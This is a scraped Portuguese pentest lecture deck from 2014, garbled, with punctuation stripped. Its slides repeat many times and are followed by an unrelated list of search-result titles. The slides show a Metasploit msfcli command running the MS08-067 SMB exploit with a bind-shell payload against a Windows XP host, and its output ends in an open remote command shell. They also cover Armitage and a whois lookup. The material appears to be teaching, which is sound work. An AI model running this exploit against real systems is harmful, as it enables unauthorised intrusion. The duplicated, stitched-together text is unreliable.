PROMPT WINDOWS REMOTO

rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful

Running Armitage

To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage

Acumulando o reconhecimento do ambiente

Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode

danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o

ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS

quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute

rastrear teus passos depois do evento

whois Lookups

msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM

  • PENTEST
  • Slide 2
  • Slide 3
  • Slide 4
  • Pentester antigo
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Hoje
  • Fases dos testes de PTEST
  • Metasploit ndash explorando vulnerabilidades
  • Metasploit
  • Slide 16
  • Sample Usage
  • Slide 18
  • Slide 19
  • PROMPT WINDOWS REMOTO
  • Running Armitage
  • Slide 22
  • Acumulando o reconhecimento do ambiente
  • whois Lookups
Page 9: PENTEST Cerutti – IESGF - 2014. Pentester antigo Facilidades pela novidade Departamentos não estavam preparados e... Acontecia facilmente:

You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree

Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE

PROMPT WINDOWS REMOTO

rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful

Running Armitage

To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage

Acumulando o reconhecimento do ambiente

Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode

danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o

ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS

quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute

rastrear teus passos depois do evento

whois Lookups

msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM

  • PENTEST
  • Slide 2
  • Slide 3
  • Slide 4
  • Pentester antigo
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Hoje
  • Fases dos testes de PTEST
  • Metasploit ndash explorando vulnerabilidades
  • Metasploit
  • Slide 16
  • Sample Usage
  • Slide 18
  • Slide 19
  • PROMPT WINDOWS REMOTO
  • Running Armitage
  • Slide 22
  • Acumulando o reconhecimento do ambiente
  • whois Lookups
Page 10: PENTEST Cerutti – IESGF - 2014. Pentester antigo Facilidades pela novidade Departamentos não estavam preparados e... Acontecia facilmente:

Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE

PROMPT WINDOWS REMOTO

rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful

Running Armitage

To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage

Acumulando o reconhecimento do ambiente

Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode

danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o

ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS

quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute

rastrear teus passos depois do evento

whois Lookups

msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM

  • PENTEST
  • Slide 2
  • Slide 3
  • Slide 4
  • Pentester antigo
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Hoje
  • Fases dos testes de PTEST
  • Metasploit ndash explorando vulnerabilidades
  • Metasploit
  • Slide 16
  • Sample Usage
  • Slide 18
  • Slide 19
  • PROMPT WINDOWS REMOTO
  • Running Armitage
  • Slide 22
  • Acumulando o reconhecimento do ambiente
  • whois Lookups
Page 11: PENTEST Cerutti – IESGF - 2014. Pentester antigo Facilidades pela novidade Departamentos não estavam preparados e... Acontecia facilmente:

PROMPT WINDOWS REMOTO

rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful

Running Armitage

To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage

Acumulando o reconhecimento do ambiente

Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode

danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o

ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS

quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute

rastrear teus passos depois do evento

whois Lookups

msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM

  • PENTEST
  • Slide 2
  • Slide 3
  • Slide 4
  • Pentester antigo
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Hoje
  • Fases dos testes de PTEST
  • Metasploit ndash explorando vulnerabilidades
  • Metasploit
  • Slide 16
  • Sample Usage
  • Slide 18
  • Slide 19
  • PROMPT WINDOWS REMOTO
  • Running Armitage
  • Slide 22
  • Acumulando o reconhecimento do ambiente
  • whois Lookups
Page 12: PENTEST Cerutti – IESGF - 2014. Pentester antigo Facilidades pela novidade Departamentos não estavam preparados e... Acontecia facilmente:

Running Armitage

To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage

Acumulando o reconhecimento do ambiente

Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode

danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o

ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS

quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute

rastrear teus passos depois do evento

whois Lookups

msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM

  • PENTEST
  • Slide 2
  • Slide 3
  • Slide 4
  • Pentester antigo
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Hoje
  • Fases dos testes de PTEST
  • Metasploit ndash explorando vulnerabilidades
  • Metasploit
  • Slide 16
  • Sample Usage
  • Slide 18
  • Slide 19
  • PROMPT WINDOWS REMOTO
  • Running Armitage
  • Slide 22
  • Acumulando o reconhecimento do ambiente
  • whois Lookups
Page 13: PENTEST Cerutti – IESGF - 2014. Pentester antigo Facilidades pela novidade Departamentos não estavam preparados e... Acontecia facilmente:

Acumulando o reconhecimento do ambiente

Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode

danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o

ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS

quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute

rastrear teus passos depois do evento

whois Lookups

msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM

  • PENTEST
  • Slide 2
  • Slide 3
  • Slide 4
  • Pentester antigo
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Hoje
  • Fases dos testes de PTEST
  • Metasploit ndash explorando vulnerabilidades
  • Metasploit
  • Slide 16
  • Sample Usage
  • Slide 18
  • Slide 19
  • PROMPT WINDOWS REMOTO
  • Running Armitage
  • Slide 22
  • Acumulando o reconhecimento do ambiente
  • whois Lookups
Page 14: PENTEST Cerutti – IESGF - 2014. Pentester antigo Facilidades pela novidade Departamentos não estavam preparados e... Acontecia facilmente:

whois Lookups

msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM

  • PENTEST
  • Slide 2
  • Slide 3
  • Slide 4
  • Pentester antigo
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Hoje
  • Fases dos testes de PTEST
  • Metasploit ndash explorando vulnerabilidades
  • Metasploit
  • Slide 16
  • Sample Usage
  • Slide 18
  • Slide 19
  • PROMPT WINDOWS REMOTO
  • Running Armitage
  • Slide 22
  • Acumulando o reconhecimento do ambiente
  • whois Lookups

Guia do Hacker Brasileiro - portalnewschool.comportalnewschool.com/Arquivos/PDFS/Pentest/Guia do Hacker Brasileiro... · Um inseto havia ficado preso dentro da máquina e estava atrapalhando

Guia do Hacker Brasileiro - portalnewschool.comportalnewschool.com/Arquivos/PDFS/Pentest/Guia do Hacker Brasileiro... · Um inseto havia ficado preso dentro da máquina e estava atrapalhando

Forense computacional em Linux for dummiesportalnewschool.com/Arquivos/PDFS/Pentest/forense_linux.pdf · Forense computacional é a ciência voltada para a ... trônica digital, como

Forense computacional em Linux for dummiesportalnewschool.com/Arquivos/PDFS/Pentest/forense_linux.pdf · Forense computacional é a ciência voltada para a ... trônica digital, como

Pentest conisli07

Pentest conisli07

Testes de Invasão - Pentest

Testes de Invasão - Pentest

Disciplina de Gerência de Redes e Serviços de Comunicações Multimídia Prof. Fernando Cerutti Ataliba Zandomenego Filho Lucinei Manenti Disciplina de Gerência.

Disciplina de Gerência de Redes e Serviços de Comunicações Multimídia Prof. Fernando Cerutti Ataliba Zandomenego Filho Lucinei Manenti Disciplina de Gerência.

TREINAMENTO - Formação de Pentest Profissional - Desec ... · que expõe o cenário real de sua exposição em ambiente digital. BUSCAMOS SEMPRE EXCELÊNCIA 03 ... Conhecendo a

TREINAMENTO - Formação de Pentest Profissional - Desec ... · que expõe o cenário real de sua exposição em ambiente digital. BUSCAMOS SEMPRE EXCELÊNCIA 03 ... Conhecendo a

Gustavo Moreira Amorim Gisele Cerutti Beatriz Moritz Trope Tullia Cuzzi Cecilia Lagalhard

Gustavo Moreira Amorim Gisele Cerutti Beatriz Moritz Trope Tullia Cuzzi Cecilia Lagalhard

Pesquisa - ufjf.br · tantas vezes, por que guardo ... ele não abre mão de ter consigo seus livros. ... suas mãos: O que acontecia, acontecia no livro, e eu era o narrador. A

Pesquisa - ufjf.br · tantas vezes, por que guardo ... ele não abre mão de ter consigo seus livros. ... suas mãos: O que acontecia, acontecia no livro, e eu era o narrador. A

4.1- Resultado Parcial LISTAGEM CANDIDATOS 26-11-12 SITElegado.vitoria.es.gov.br/secretarias/administracao/editais... · aci maria costa adriana cerutti ... mauriceia malta michelle

4.1- Resultado Parcial LISTAGEM CANDIDATOS 26-11-12 SITElegado.vitoria.es.gov.br/secretarias/administracao/editais... · aci maria costa adriana cerutti ... mauriceia malta michelle

Cerutti - 15-464-1-PB

Cerutti - 15-464-1-PB

Compreestelivro.. Algo acontecia em casa da Maria.

Compreestelivro.. Algo acontecia em casa da Maria.

PENTEST + CEH...PENTEST E ANÁLISE DE VULNERABILIDADES 3 @grupoutah 11-9.6931-1515 utah.com.br Fingerprinting manual e automatizado o Estudo sobre protocolos de rede o A ferramenta

PENTEST + CEH...PENTEST E ANÁLISE DE VULNERABILIDADES 3 @grupoutah 11-9.6931-1515 utah.com.br Fingerprinting manual e automatizado o Estudo sobre protocolos de rede o A ferramenta

Estudo Setorial para Consolidaçao de uma Aquicultura ... · ESTUDO SETORIAL PARA CONSOLIDAÇÃO DE UMA ... SEAP‐PR ‐ Institucional e Estrutura da SEAP‐PR, Cezer Luiz Cerutti

Estudo Setorial para Consolidaçao de uma Aquicultura ... · ESTUDO SETORIAL PARA CONSOLIDAÇÃO DE UMA ... SEAP‐PR ‐ Institucional e Estrutura da SEAP‐PR, Cezer Luiz Cerutti

Workshop Riosoft Auditoria Teste de Invasão(pentest)

Workshop Riosoft Auditoria Teste de Invasão(pentest)

Izabella Cerutti Nivia Maseri PROCESSOS DE GESTÃO DO ERRO NA PRODUÇÃO DE CONTEÚDOS PARA EAD.

Izabella Cerutti Nivia Maseri PROCESSOS DE GESTÃO DO ERRO NA PRODUÇÃO DE CONTEÚDOS PARA EAD.

UNIVERSIDADE FEDERAL DO AMAZONAS INSTITUTO DE … · 2021. 7. 9. · Pentest. 2. Vulnerabilidade Computacional. 3. Ameaça Computacional. 4. ... Monografia apresentada ao Instuto

UNIVERSIDADE FEDERAL DO AMAZONAS INSTITUTO DE … · 2021. 7. 9. · Pentest. 2. Vulnerabilidade Computacional. 3. Ameaça Computacional. 4. ... Monografia apresentada ao Instuto

Horacio Cerutti - Intelectuales ideas e identidad en Nuestra América

Horacio Cerutti - Intelectuales ideas e identidad en Nuestra América

O que acontecia na Alemanha para impulsionar a criação da Escola de Frankfurt?

O que acontecia na Alemanha para impulsionar a criação da Escola de Frankfurt?

Documento1 - camaracapeladoalto.sp.gov.brcamaracapeladoalto.sp.gov.br/pdf/pautas_e_atas_2013/ata_18_sessao... · de Almeida, para participar da novena que acontecia em hožnenagem

Documento1 - camaracapeladoalto.sp.gov.brcamaracapeladoalto.sp.gov.br/pdf/pautas_e_atas_2013/ata_18_sessao... · de Almeida, para participar da novena que acontecia em hožnenagem

Gisele Cerutti, Luiza Bertolace Marques, Danielle Carvalho Quintella, Maria Leide Wand Del Rey de Oliveira, Tullia Cuzzi Hanseníase tuberculóide (HTT)

Gisele Cerutti, Luiza Bertolace Marques, Danielle Carvalho Quintella, Maria Leide Wand Del Rey de Oliveira, Tullia Cuzzi Hanseníase tuberculóide (HTT)